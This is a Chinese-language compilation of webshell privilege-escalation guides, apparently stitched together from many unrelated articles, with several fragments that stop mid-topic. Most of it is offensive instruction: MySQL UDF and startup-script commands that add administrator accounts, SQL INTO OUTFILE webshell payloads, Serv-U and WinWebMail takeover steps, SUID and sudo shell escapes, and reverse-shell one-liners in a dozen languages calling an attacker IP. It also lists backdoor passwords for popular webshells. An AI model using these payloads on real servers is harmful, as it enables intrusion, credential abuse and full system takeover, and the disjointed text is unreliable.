最全的WEBSHELL提权方法总结

MySQL提权之udf提权（获得webshell的情况）什么是udf提权？MySQL提供了⼀个让使⽤者⾃⾏添加新的函数的功能，这种⽤户⾃⾏扩展函数的功能就叫udf。

它的提权原理也⾮常简单！即是利⽤了root ⾼权限，创建带有调⽤cmd的函数的udf.dll动态链接库！这样⼀来我们就可以利⽤ system权限进⾏提权操作了！当我们拿到webshell后，由于中间件,例如，apache使⽤了较低的权限，可能仅仅是个⽹络服务的权限，然后我们就需要进⾏提权，⽽有时候⽬标机器补丁较全，各种系统提权姿势都失效的情况下，可以将⽬光转义到数据库服务上，在Windows下，在较低版本的mysql（<5.6）安装时默认是系统权限。

还有就是很多⼈图⽅便，例如使⽤了各种集成环境，未做安全设置，直接⽤⾼权限账户进⾏站点配置，就可以考虑⽤UDF进⾏提权。

dll⽂件的好处？1.扩展了应⽤程序的特性;2.可以⽤许多种编程语⾔来编写;3.简化了软件项⽬的管理;4.有助于节省内存;5.有助于资源共享;什么是udf库？UDF表⽰的是MySQL中的⽤户⾃定义函数。

这就像在DLL中编写⾃⼰的函数并在MySQL中调⽤它们⼀样。

我们将使⽤“lib_mysqludf_sys_64.dll”DLL 库不同版本的区别：MySql < 4.1:允许⽤户将任何的DLL⽂件⾥⾯的函数注册到MySql⾥。

MySql 4.1-5.0：对⽤来注册的DLL⽂件的位置进⾏了限制，通常我们选择 UDF导出到系统⽬录C:/windows/system32/来跳过限制。

MySql >=5.1:这些DLL只能被放在MySql的plugin⽬录下。

0x01 提权的前提1. 必须是root权限（主要是得创建和抛弃⾃定义函数）2. secure_file_priv=(未写路径)3. 将udf.dll⽂件上传到MySQL的plugin⽬录下（这⾥以MySQL>=5.1为例）0x02 开始提权这⾥以本地为例1.我们这⾥上传了⼀句话，然后⽤菜⼑连接上先判断数据库版本select version();符合MySql>=5.1的情况。

常见提权方法1. 用户提权：用户提权是指普通用户通过某种方式获取管理员权限或超级用户权限的行为。

常见的用户提权方法包括：利用弱密码、使用系统漏洞、利用特权提升程序等。

详细描述：用户提权是黑客经常使用的一种手段，通过获取管理员权限，黑客可以执行更高级别的操作，如修改系统配置、访问敏感文件等。

利用弱密码是最常见的用户提权方法之一。

黑客可以使用密码破解工具或暴力破解技术尝试猜解用户密码，一旦成功登录系统，就可以获取管理员权限。

系统漏洞也是用户提权的常见方法之一。

黑客可以通过渗透测试或漏洞扫描等方式发现系统中的漏洞，然后利用这些漏洞获取管理员权限。

某个系统可能存在一个未修补的漏洞，黑客可以利用这个漏洞上传特制的脚本，从而获得系统的控制权。

黑客还可以利用特权提升程序来提权。

这些程序的功能是在受限的用户权限下执行特权操作，如创建新用户、修改用户组等。

黑客可以通过执行这些特权提升程序来获取管理员权限，从而获得系统的完全控制权。

2. 命令注入：命令注入是指黑客通过在输入框或URL参数中注入恶意命令，从而执行非授权的操作。

常见的命令注入方法包括：通过修改URL参数、利用操作系统命令执行漏洞等。

详细描述：命令注入是一种常见的网络攻击手法，黑客通过在输入框或URL参数中注入恶意命令，从而执行非授权的操作。

黑客可以在一个搜索框中输入特定的字符串，以执行系统命令，或是通过改变URL参数来获取系统权限。

命令注入通常利用了操作系统的命令执行漏洞。

当用户传递的输入被直接用于构造系统命令时，如果没有正确进行输入验证和过滤，黑客就可以通过构造恶意输入来执行非授权的操作。

这种攻击方式在许多Web应用程序中非常常见，如论坛、博客等。

为了防止命令注入攻击，开发者应该始终对用户输入进行适当的验证和过滤。

可以使用特定的字符过滤器来禁止或转义危险的字符，或是通过使用参数化查询和预编译语句等方式防止SQL注入。

3. 文件包含漏洞：文件包含漏洞是指黑客通过利用应用程序中的文件包含功能来执行恶意代码。

webshell msf 提权方法
Webshell是一种可以用来执行命令的脚本，通常用于攻击者在受害者的服务器上执行恶意操作。

MSF（Metasploit Framework）是一种流行的渗透测试工具，可以用于执行各种攻击和提权操作。

以下是使用MSF进行Webshell提权的一般步骤：
1. 获取Webshell：首先，攻击者需要将Webshell上传到受害者的服务器上。

这可以通过多种方式完成，例如通过文件上传漏洞、利用Web应用程序漏洞或其他漏洞。

2. 扫描目标：一旦Webshell上传成功，攻击者可以使用MSF的扫描器来扫描目标服务器的漏洞和弱点。

这可以帮助攻击者确定哪些用户和系统具有潜在的提权机会。

3. 执行攻击：一旦攻击者确定了潜在的提权机会，他们可以使用MSF的各种攻击模块来尝试提权。

这可能包括利用系统漏洞、使用缓冲区溢出攻击、执行命令注入等。

4. 获取权限：如果攻击成功，攻击者将获得对目标服务器的权限。

这可能包括管理员权限或其他高权限。

需要注意的是，这些步骤只是一个一般性的概述，并且实际情况可能因目标系统和环境而异。

此外，使用这些技术进行非法活动是非法的，并且可能导致严重的法律后果。

因此，建议仅在合法和授权的情况下使用这些技术。

说到花了九牛二虎的力气获得了一个webshell，当然还想继续获得整个服务器的admin权限，正如不想得到admin的不是好黑客～嘻嘻～～好跟我来，看看有什么可以利用的来提升权限第一如果服务器上有装了pcanywhere服务端，管理员为了管理方便也给了我们方便，到系统盘的Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/中下载*.cif本地破解就使用pcanywhere连接就ok了第二有很多小黑问我这么把webshell的iis user权限提升一般服务器的管理都是本机设计完毕然后上传到空间里，那么就会用到ftp，服务器使用最多的就是servu那么我们就利用servu来提升权限通过servu提升权限需要servu安装目录可写～好开始把，首先通过webshell访问servu安装文件夹下的ServUDaemon.ini把他下载下来，然后在本机上安装一个servu把ServUDaemon.ini放到本地安装文件夹下覆盖，启动servu添加了一个用户，设置为系统管理员，目录C:\，具有可执行权限然后去servu安装目录里把ServUDaemon.ini更换服务器上的。

用我新建的用户和密码连接～好的，还是连上了ftpftp>open ipConnected to ip.220 Serv-U FTP Server v5.0.0.4 for WinSock ready...User (ip:(none)): id //刚才添加的用户331 User name okay, please send complete E-mail address as password. Password:password //密码230 User logged in, proceed.ftp> cd winnt //进入win2k的winnt目录250 Directory changed to /WINNTftp>cd system32 //进入system32目录250 Directory changed to /WINNT/system32ftp>quote site exec net.exe user rover rover1234 /add //利用系统的net.exe 文件加用户。

webshell在kali中的用法和防范措施Webshell是一种黑客常用的工具，它可以通过在目标系统上上传并执行一段恶意代码，从而获得对目标系统的控制权。

在网络安全领域中，特别是在红队和渗透测试中，了解webshell的用法以及如何防范它是非常重要的。

首先，让我们了解一下webshell在Kali中的用法。

Kali Linux是一种广泛应用于渗透测试和网络安全研究的操作系统。

由于Kali Linux是专为渗透测试和安全评估而设计的，它提供了丰富的工具和资源来测试和攻击目标系统。

1. 上传webshell：在Kali Linux中，可以使用各种方式来上传webshell到目标系统。

常用的技术包括利用文件上传漏洞、钓鱼攻击和社交工程等。

通过这些方法，黑客可以将webshell文件上传到目标系统的可访问目录中，并通过Web服务器执行该文件。

2. 运行命令并执行操作：一旦成功上传webshell文件，黑客可以利用它来执行各种操作，例如列出目录、上传和下载文件、执行命令、创建用户和访问系统数据等。

webshell通常具有一个命令行界面，黑客可以使用它来与目标系统进行交互。

3. 接管系统控制权：通过webshell，黑客可以远程接管目标系统，并获得对操作系统的完全控制。

这使得黑客可以操纵目标系统，执行各种恶意操作，如数据窃取、破坏系统文件、安装后门等。

鉴于webshell的危害性，我们必须采取适当的防范措施来保护目标系统。

以下是一些防范webshell的常见措施：1. 定期更新和修补系统：保持目标系统的操作系统和应用程序更新可以减少webshell利用已知漏洞的风险。

及时修补已知漏洞是防止黑客利用这些漏洞上传webshell的有效方法。

2. 强化访问控制：合理配置系统的访问控制措施是防范webshell的关键。

限制web服务器上可执行的文件和目录的访问权限，仅允许合法用户执行必要的操作。

此外，还应对文件上传功能进行严格的用户验证和检查，以防止恶意文件上传。

WinWebMail 7i24提权网站平安电脑资料一、WinWebMail程序安装为系统效劳，程序一般是在admin权限下运行的，而效劳程序emsvr.exe是在system权限下运行的，这样，我们就可以通过这个破绽来提升权限了，在硬盘分区为NTFS格式下，WinWebMail会要求安装目录为everyone可写，这是因为它是Web效劳式的邮件系统，需要通过ASP文件读写用户邮箱，也就是对应于某个用户名的文件夹，而普通的ASP程序解析权限很低，所以必须得让WinWebMail所在的目录拥有everyone可写权限，不然程序会无法正常读写这些用户文件夹的。

在FAT32格式下就更不用说了，我们可以随意修改popusers.ini文件，从而溢出获得更高权限了。

最后再说说远程利用的方法。

因为我们可以通过Web来用户，所以可以利用抓包软件来修改信息，从而间接修改ini文件，等到效劳器重启的时候，就可以利用破绽了。

该破绽影响范围到3.7.3.1以前的版本————————————————————————————————————就是winwebmail邮件效劳器系统，用户名和密码全部存在winwebmail的安装目录中popusers.ini文件里面！包括admin员用户！当然，密码是加密的！我们要做的，就是在本地装一个一样版本的winwebmail，然后将本地加密过的已经密码代码，利用webshell交换掉效劳器上的，这台mail效劳器就到手了！（说白了还是因为WinWebMail会要求安装目录为everyone可写）————————————————————————————————————WinWebMail目录下的web必须设置everyone权限可读可写，不然邮件登陆不上去等等，所以在开始程序里找到winwebmail快捷方式下下来，看途径，访问途径\web传shell，访问shell后，默认权限是system，放远控进启动项，等待下次重启，比方c:\winwebmail\web，假设不能阅读换为d:\winwebmail\web\（一定要是web目录，本人多方测试c:\winwebmail一样无权阅读）另外假设查不出途径请用表读取：HKEYLOCALMACHINE\SYSTEM\ControlSet001\Services\WinWebMail Server\imagepath二、7i24的web目录也是可写，权限为administrator。

常见的提权方法1. 提权方法之一是利用弱密码。

当系统或应用程序使用弱密码进行身份验证时，攻击者可以使用字典攻击、暴力破解或社交工程等技术来猜解密码并获取管理员权限。

2. 通过漏洞利用来提权也是一种常见的方法。

攻击者可以利用系统、应用程序或服务的安全漏洞，通过代码注入、缓冲区溢出等技术来获取提权权限。

3. 通过系统配置错误来提权。

攻击者可以利用系统管理员在配置文件、访问控制列表或权限设置等方面的错误来获得更高的权限。

4. 利用恶意软件进行提权也是一种常见的方法。

攻击者可以通过植入恶意软件、后门程序或恶意脚本等方式，在受害者计算机上运行，并以管理员权限执行特定操作。

5. 通过内核提权也是一种常见的方法。

攻击者可以利用操作系统内核的漏洞，通过缓冲区溢出、内存损坏或环境变量篡改等技术来获取提权权限。

6. 利用特权升级工具进行提权是另一种常见的方法。

这些工具包括Metasploit、Backtrack、Kali Linux等，它们提供了各种漏洞利用和提权的功能。

7. 利用附加权限漏洞进行提权。

当系统或应用程序授予某些用户或组额外的特权时，攻击者可以利用这些漏洞来获取提权权限。

8. 通过利用网络服务进行提权。

一些网络服务存在软件或配置漏洞，攻击者可以通过这些漏洞利用来获取提权权限。

9. 利用操作系统的弱点进行提权。

操作系统中可能存在一些安全性较弱的功能或配置，攻击者可以利用这些弱点来获取管理员权限。

10. 攻击者还可以通过社交工程和伪造身份来获取提权权限。

他们可能通过欺骗或说服其他用户来获得管理员权限，或者利用钓鱼等技术获取管理员凭据。

提权以及反弹shell⼀些⽅法提权以及反弹shellnetcat反弹shellkali中使⽤nc(netcat)进⾏监听⽤法 : nv -lvvp 2333(端⼝号)靶机中使⽤ bash -c 'bash -i >&/dev/tcp/192.168.1.1/2333 0>&1' 同样可以写成⼀句话⽊马进⾏反弹shell。

命令提权1、使⽤suid提权，找到⼀个属于root的具有s权限的⽂件；s是提权符find / -user root -perm -4000 -print 2>/dev/nullfind / -perm -u=s -type f 2>/dev/nullfind / -user root -perm -4000 -exec ls -ldb {} \;例如：在DC-1中，⾸先touch新建⼀个⽂件，然后执⾏touch abcdfind abcd -exec whoami \;find / -name abcd -exec "/bin/sh" \; #分号需要转义，find以分号结尾具有提权功能的Linux可执⾏⽂件包括：nmapvimfindbashmorelessnanocppython反弹shell#!/usr/bin/pythonimport os,subprocess,sockets=socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(("攻击机IP地址","攻击机监听端⼝"))os.dup2(s.fileno(),0)os.dup2(s.fileno(),1)os.dup2(s.fileno(),2)p=subprocess.call(["/bin/sh","-i"])其他⼀些⽅法#bash版本：bash -i >& /dev/tcp/10.0.0.1/8080 0>&1#perl版本:perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' #python版本：python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'#php版本：php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'#ruby版本：ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'#nc版本：nc -e /bin/sh 10.0.0.1 1234rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/fnc x.x.x.x 8888|/bin/sh|nc x.x.x.x 9999#java版本r = Runtime.getRuntime()p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])p.waitFor()#lualua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"git提权sudo -l 查看具有sudo执⾏权限的命令sudo git -p help或者 sudo git help config!/bin/bashzip提权touch exploitsudo -u root zip exploit.zip exploit -T --unzip-command="sh -c /bin/bash"tar提权收集信息：内外⽹服务器系统和版本位数服务器的补丁情况服务器的安装软件情况服务器的防护软件情况端⼝情况⽀持脚本情况信息收集常⽤命令：Windows:ipconfig /allnet usernetstat -anoversysteminfotasklist /svctaskkill -PID pid号taskkill /im qq.exe /fnet user test 123456 /addnet localgroup administrators test /addwhoamiCMD⽆法执⾏1、防护软件拦截2、CMD被降权3、组件被删除找可读写⽬录上传cmd.exe，将执⾏的cmd.exe路径替换成上传的路径查找3389端⼝1、注册表读取2、⼯具扫描3、命令探针端⼝转发lcx⽹站服务器是内⽹IP：192.168.2.3外⽹服务器IP是：192.168.80.151在内⽹服务器上执⾏的lcx命令是：lcx.exe -slave 192.168.80.151 51 192.168.2.3 3389在外⽹服务器上执⾏的lcx命令是：lcx.exe -listen 51 3389数据库提权MSSQL提权：安装组件--->开启3389---->创建⽤户------>提升权限------>完成Mysql提权：1、udf提权获取到对⽅数据库⽤户root的账号密码查看⽹站源码⾥⾯数据库配置⽂件(common,config.php,common.inc.php,data)查看数据库的配置⽂件暴⼒破解、mysql密码破解、3306端⼝⼊侵udf提权原理：通过root权限导出udf.dll到系统⽬录下，可以通过udf.dll调⽤执⾏cmd导出到\lib/plugin\安装⽬录下create function cmdshell returns string soname 'udf.dll'select cmdshell('net user test 123456 /add');select cmdshell('net localgroup administrators test /add');drop function cmdshell //删除函数2、启动项提权1、查看我们进⼊数据库中有什么表show tables;默认情况下，test中没有任何表的存在关键部分：2、在test数据库下创建⼀个新的表create table a(cmd text);表名为a，字段名为cmd，为text⽂本3、在表中插⼊数据insert into a values ("set wshshell=createobject(""wscript.shell"")");insert into a values ("a=wshshell.run(""cmd.exe /c net user test 123456 /add"",0)");insert into a values ("b=wshshell.run(""cmd.exe /c net localgroup Administrators test /add"",0)")双引号和括号以及后⾯的0⼀定要输⼊，⽤这三条命令建⽴⼀个vbs的脚本程序！4、查看数据表select * form a;5、输出表为⼀个vbs的脚本⽂件select * from a into outfile "c://开机菜单//启动//a.vbs";6、重启3、mof提权4、反连端⼝提权Windows提权:开启3389使⽤批处理⽂件开3389使⽤sql语句开3389使⽤exe开3389使⽤vb开3389使⽤wireshark或cain嗅探3389获取账号名和密码Linux提权：uname -r 查看内核版本信息找到对应版本的exp上传----编译---运⾏----ok。

最全Windows提权总结（建议收藏）当以低权⽤户进去⼀个陌⽣的windows机器后，⽆论是提权还是后续做什么，第⼀步肯定要尽可能的搜集信息。

知⼰知彼，才百战不殆。

常规信息搜集systeminfo 查询系统信息hostname 主机名net user 查看⽤户信息netstat -ano|find "3389" 查看服务pid号wmic os get caption 查看系统名wmic qfe get Description,HotFixID,InstalledOn 查看补丁信息wmic product get name,version 查看当前安装程序wmic service list brief 查询本机服务wmic process list brief 查询本机进程net share 查看本机共享列表netsh firewall show config 查看防⽕墙配置常见的杀软如下：360sd.exe 360杀毒360tray.exe 360实时保护ZhuDongFangYu.exe 360主动防御KSafeTray.exe ⾦⼭卫⼠SafeDogUpdateCenter.exe 安全狗McAfee McShield.exe McAfeeegui.exe NOD32AVP.exe 卡巴斯基avguard.exe ⼩红伞bdagent.exe BitDefender要搜集的信息⼤致如下⼏点：机器的系统及其版本机器的打补丁情况机器安装的服务机器的防⽕墙策略配置机器的防护软件情况提权简介提权可分为纵向提权与横向提权：纵向提权：低权限⾓⾊获得⾼权限⾓⾊的权限；横向提权：获取同级别⾓⾊的权限。

Windows常⽤的提权⽅法有：系统内核溢出漏洞提权、数据库提权、错误的系统配置提权、组策略⾸选项提权、WEB中间件漏洞提权、DLL劫持提权、滥⽤⾼危权限令牌提权、第三⽅软件/服务提权等1、系统内核溢出漏洞提权#⼿⼯查找补丁情况systeminfo查看补丁wmic qfe get Description,HotFixID,InstalledOn 查看补丁信息#MSF后渗透扫描post/windows/gather/enum_patches利⽤（Vulmap、Wes、WindowsVulnScan）对⽐补丁进⽽进⾏提权2、at命令利⽤在Windows2000、Windows 2003、Windows XP 这三类系统中，我们可以使⽤at命令将权限提升⾄system权限。

老树开花-利用IIS写权限漏洞+Serv-U提权拿服务器2011年03月31日星期四 15:43声明：本文没有任何技术含量，99.99%的内容是炒冷饭。

写这篇文章的目的在于：提醒大家不要忘了那些曾经很黄很暴力的漏洞，老洞常温，拿站很稳。

o(∩_∩)o第一大步：获取WebShell其实，一开始并没有准备搞渗透，只不过是想用IIS PUT Scanner 扫几台网络摄像头玩玩。

正应了那句老话：有心栽花花不开，无心插柳柳成荫。

Net Camera没找到，倒是意外地发现了2台有IIS 写权限漏洞的服务器。

怎么办？纠结，“整“！！！试了下IIS IIS PUT Scanner自带的上传功能，结果挂了！这时候千万不要放弃，经验告诉我，IIS IIS PUT Scanner的上传功能很不给力，完全是鸡肋嘛！换抢，试试老兵的IIS 写权限利用工具。

尝试PUT一个后缀为txt的ASP大马，返回信息：201 Created，运气很好，创建成功。

有的玩了:-)不过不要高兴的太早，马儿目前还是以TXT的格式躺在服务器里。

要使它跑起来，就要用到MOVE方法(类似Linux的重命名操作)将其转换成ASP格式，当然前提是服务器支持ASP，否则一切活动到此为止吧！RP大爆发！居然成功了，默认地址是/shell.asp。

如果MOVE方法不行，可以试试Copy 方法，做事不要一根筋嘛！第二大步：提权老规矩，执行CMD命令。

要是没CMD执行权限，找个可写目录上传下就O了。

我这里可以直接执行，一切都很顺利。

正因为如此，开篇才说本文没任何技术含量。

NetStat -an，神马情况，43958？Serv_U。

笑吧！提权在握。

果断点击Serv-U提权，啥命令也没改，使用默认Seru_U用户名和密码登录。

这么垃圾的管理员，肯定不会去改动滴。

接下来用同样的方法，执行了一个开3389的批处理，这种东西网上满天飞。

更棒的是，2003开3389后不用重启，直接登录。

WEBSHELL权限提升技巧WEBSHELL权限提升技巧c: d: e:.....C:\Documents and Settings\All Users\「开始」菜单\程序\看这⾥能不能跳转，我们从这⾥可以获取好多有⽤的信息⽐如Serv-U的路径，C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\看能否跳转到这个⽬录，如果⾏那就最好了，直接下它的CIF⽂件，破解得到pcAnywhere密码，登陆c:\Program Files\serv-u\C:\WINNT\system32\config\下它的SAM，破解密码c:\winnt\system32\inetsrv\data\是erveryone 完全控制，很多时候没作限制，把提升权限的⼯具上传上去，然后执⾏c:\prelC:\Program Files\Java Web Start\c:\Documents and Settings\C:\Documents and Settings\All Users\c:\winnt\system32\inetsrv\data\c:\Program Files\c:\Program Files\serv-u\C:\Program Files\Microsoft SQL Server\c:\Temp\c:\mysql\(如果服务器⽀持PHP）c:\PHP(如果服务器⽀持PHP）运⾏"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限还可以⽤这段代码试提升，好象不是很理想的如果主机设置很变态，可以试下在c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写⼊bat，vbs等⽊马。

三大数据库写入WebShell的姿势总结美创科技安全实验室WebShell作为黑客常用来提权的工具，通常出现在存在任意文件上传漏洞的网站中，但如果遇到一个没有任何的上传点的网站，想通过文件上传漏洞获得权限显然就行不通了，但所谓“山穷水尽疑无路、柳暗花明又一村”，此时一个SQL注入点摆在你眼前，你能否珍惜这来之不易的机会，拿到WebShell呢？本期美创安全实验室将带大家了解，如何通过数据库获取网站的WebShell。

MySQL写入WebShell1必备条件想要成功向MySQL写入WebShell需要至少满足以下4个条件：①数据库的当前用户为ROOT或拥有FILE权限；②知道网站目录的绝对路径；③PHP的GPC参数为off状态；④MySQL中的secure_file_priv参数不能为NULL状态。

注意：关于其中第4点，secure_file_priv参数是MySQL用来限制数据导入和导出操作的效果，如果这个参数被设为了一个目录名，那么MySQL会允许仅在这个目录中可以执行文件的导入和导出，例如LOAD DATA、SELECT。

INTOOUTFILE、LOAD_FILE()等。

如果这个参数为NULL，MySQL会禁止导入导出操作，但是这只是意味着通过outfile方法写入WebShell是无法成功的，但是通过导出日志的方法是可以的。

2写入方法向MySQL写入WebShell的方式一共有两种，分别是：1、使用outfile方法，2、基于log日志写入法。

Outfile方法其实是Mysql提供的一个用来写入文件的函数，当我们可以控制写入的文件内容以及文件的保存路径时，我们就可以达到传入WebShell的目的。

当我们可以使用union 查询时，我们构造一个如下语句，就可以达到效果：Union select“这里是WebShell”into outfile“Web目录”；当我们无法使用union时，还有一些其他方法也可以实现（利用分隔符写入）：?id=1INTO OUTFILE'物理路径'lines terminatedby（这里是WebShell）#?id=1INTO OUTFILE'物理路径'fields terminatedby（这里是WebShell）#?id=1INTO OUTFILE'物理路径'columns terminatedby（这里是WebShell）#?id=1INTO OUTFILE'物理路径'lines startingby（这里是WebShell）#基于log日志写入的方法其实是先将日志文件的导出目录修改成Web目录，然后执行了一次简单的WebShell代码查询功能，此时日志文件记录了此过程，这样再Web目录下的日志文件就变成了WebShell。

本地溢出提权0x00 前言0x01 找可写目录0x02 运行exploit提权0x03 附录0x00 前言溢出漏洞就像杯子里装水,水多了杯子装不进去,就会把里面的水溢出来.而相对计算机来说计算机有个地方叫缓存区,程序的缓存区长度是被事先设定好的,如果用户输入的数据超过了这个缓存区的长度,那么这个程序就会溢出了.缓存区溢出漏洞主要是由于许多软件没有对缓存区检查而造成的.这一章大概就是说利用一些现成的造成溢出漏洞的exploit通过运行,把用户从users组或其它系统用户中提升到administrators组.首先asp webshell要支持wscript(wscript.shell/shell.application)一般翻开webshell里面都会有组件支持,看到wscript.shell 旁边的勾选上了就支持wscript,当然也有一些webshell会有诈胡的现象.- -市面上的几款比拟火的webshell貌似都有这些问题,帮朋友提权他的webshell有wscript.shell 支持,然后找个目录执行cmd的结果不行,转到我那webshell上显示没wscript.shell 支持..或者aspx能调用.net组件来执行cmd的命令.这里主要用几款市面上比拟多人利用的windows exploit提权的利用工具.0x01 找可写目录这里附上啊D写的asp版本扫描可写目录和欧欧写的aspx扫可写目录,最后附上一款我自己比拟喜欢用来日星外时候的辅助小手冰凉的aspx 通过查注册表然后获取路径,配合啊D 的扫可写目录比拟不错.这些工具我们都演示一遍吧.输入目录,然后点击开始检测,得出以下结果蓝色是貌似是代表有一定的权限,未必可写(可能可读),红色是代表文件夹可写,红色的文件呢就是代表那个文件可写了,黑色是代表不存在该文件夹.接下来演示一下欧欧写的aspx扫描,比拟简单,一看就清楚了..输入文件夹路径或者盘符0.0,接着点击ScanWrtieable即可.最后是演示一下小手冰凉写的这款通过读取注册表里的软件的路径,然后输出注册表里的数据,显示软件安装所在的路径..配合啊D的目录读写检测asp版,可以快速的找到可写目录。

获取webshell的⼗种⽅法⿊客在⼊侵企业⽹站时，通常要通过各种⽅式获取webshell从⽽获得企业⽹站的控制权，然后⽅便进⾏之后的⼊侵⾏为。

本篇⽂章将如何获取webshell总结成为了⼗种⽅法，希望⼴⼤的企业⽹络管理员能够通过了解获取的途径，对企业⾃⾝进⾏防范。

⼀、通过上传⽂件类型过滤漏洞获取webshell由于未采⽤⽩名单过滤⽂件类型，导致asa,cer,等⽂件类型，未进⾏限制，asa,cer类型⽂件的映射处理默认跟asp映射处理⼀样，将webshell伪装成该种类型的⽂件上传即可⼆、结合Burp Suite⼯具，修改上传⽂件信息，逃避验证现在很多的脚本程序上传模块不是只允许上传合法⽂件类型，⽽⼤多数的系统是允许添加上传类型 php.g1f的上传类型，这是php的⼀个特性，最后的哪个只要不是已知的⽂件类型即可，php会将php.g1f作为。

php来正常运⾏，从⽽也可成功拿到shell.LeadBbs3.14后台获得webshell⽅法是：在上传类型中增加asp ，注意，asp后⾯是有个空格的，然后在前台上传ASP马，当然也要在后⾯加个空格！三、利⽤后台管理功能写⼊webshell上传漏洞基本上补的也差不多了，所以我们进⼊后台后还可以通过修改相关⽂件来写⼊webshell.⽐较的典型的有dvbbs6.0，还有leadbbs2.88等，直接在后台修改配置⽂件，写⼊后缀是asp的⽂件。

⽽LeadBbs3.14后台获得webshell另⼀⽅法是：添加⼀个新的友情链接，在⽹站名称处写上冰狐最⼩马即可，最⼩马前后要随便输⼊⼀些字符，http：\\⽹站\inc\IncHtm\BoardLink.asp就是我们想要的shell.四、利⽤xpcmd..命令⽣成webshell五、利⽤后台数据库备份及恢复获取webshell主要是利⽤后台对access数据库的“备份数据库”或“恢复数据库”功能，“备份的数据库路径”等变量没有过滤导致可以把任意⽂件后缀改为asp，从⽽得到webshell，msssql版的程序就直接应⽤了access版的代码，导致sql版照样可以利⽤。

常见的提权方法在网络安全领域中，提权是指攻击者通过各种手段获取系统中更高权限的过程。

一旦攻击者成功提权，他们就可以执行更多的操作，访问系统资源，甚至完全控制目标系统。

本文将介绍一些常见的提权方法，以帮助人们了解并防范这些攻击。

1. 傻瓜式提权傻瓜式提权是指攻击者利用系统管理员的错误配置或弱密码进行提权的方法。

例如，系统管理员使用简单的密码，或者将密码保存在容易被猜测或暴露的位置，攻击者只需获取这些信息，便能获得管理员权限。

因此，系统管理员应遵循安全的密码管理原则，使用强密码，并定期更换密码，以防止此类攻击。

2. 系统漏洞利用系统漏洞是指操作系统或应用程序中存在的未修补的错误或缺陷，攻击者可以利用这些漏洞来获得更高的权限。

例如，攻击者可以利用操作系统或应用程序中的缓冲区溢出漏洞，覆盖控制流，执行恶意代码，并提升权限。

为了防范此类攻击，系统管理员应及时安装操作系统和应用程序的补丁，并进行定期的漏洞扫描和安全评估。

3. 社会工程学攻击社会工程学攻击是指攻击者通过与目标用户交流，获取目标用户的敏感信息，从而提升权限的方法。

攻击者可以通过电话、电子邮件、社交媒体等方式，冒充合法的实体，引诱目标用户提供用户名、密码等敏感信息。

为了防范此类攻击，用户应保持警惕，不轻易泄露个人信息，同时提高对社会工程学攻击的识别能力。

4. 特权升级特权升级是指攻击者通过利用操作系统或应用程序的漏洞，将当前权限提升到更高权限的过程。

例如，攻击者可以利用系统中存在的特权提升漏洞，获取系统管理员权限。

为了防范此类攻击，系统管理员应定期检查操作系统和应用程序的安全配置，限制普通用户的权限，并监控系统中的异常行为。

5. 密码破解密码破解是指攻击者通过穷举、字典攻击等方法，获取系统用户的密码，从而提升权限的过程。

为了防范此类攻击，用户应使用复杂的密码，包括大小写字母、数字和特殊字符，并定期更换密码。

6. 提权工具提权工具是指专门用于提升权限的软件或脚本。

最强⿊吃⿊：WEBSHELL⼤马隐藏万能密码⼤全因为很多原因，很多新⼿都不会编写⾃⼰的⼤马，⼤多数新⼿都会通过百度去下载对应脚本的⼤马，然⽽这些webshell⼤马都是早期流传出来的，基本上都存在后门，可以通过万能密码登录，即使你修改i过密码了，怎么样是不是很可怕？下⾯⼩编就将这些万能密码分享给⼤家吧！⿊⽻基地免杀asp⼤马密码5201314Hacked By CHINA! 密码chinaAsp站长助⼿6.0 密码584521web综合安全评测 – Beta3 密码nohack未知数X 密码45189946baidu｝” 密码baidu路遥知马⼒密码123⿊客⽹站之家美化版密码chenxueThé、End.゛密码and QQ：2780217151笑佛天下密码cnot西域⼩刚-站长助⼿-修改版本密码xxoxxXXXXX 密码rinima暗组超强功能修正去后门加强S-U提权版密码hkk007⿊客官⽅-长期提供⽹站⼊侵,密码破解数据库⼊侵密码chengnuoASPAdmin_A 密码”5556661221″ ‘123456⽕狐ASP⽊马(超强版)” 密码wrsk⾬夜孤魂密码54321Dark Security Team 密码yuemo 或者xingainian随风⾃由的泪密码jcksyes伟⼤的农民密码521mr.con asp⼩马密码*******JspX 密码4lert围剿专版密码yuemo或者5201314maek dream 密码hackerShell 密码xxxxx靈魂◆安全⼩组+” 密码10011C120105101银河安全⽹密码fclsharkASPXSpy 密码19880118Dark 密码376186027No Backdoor Webshell(⼑) 密码admin⿊勇⼠shell勇⼠版密码654321⼩武来了密码535039Evil sadness 密码adminF.S.T 联盟交流群内部版别外传噢密码000独⾃等待专⽤密码123windows 密码 123[D.s.T]会员专⽤WebShell 密码darkst我要进去’ 密码jcksyesHacker‘Rose 密码123456随风⾃由的泪密码jcksyesF.S.T 海盗内部版.!别外传噢。

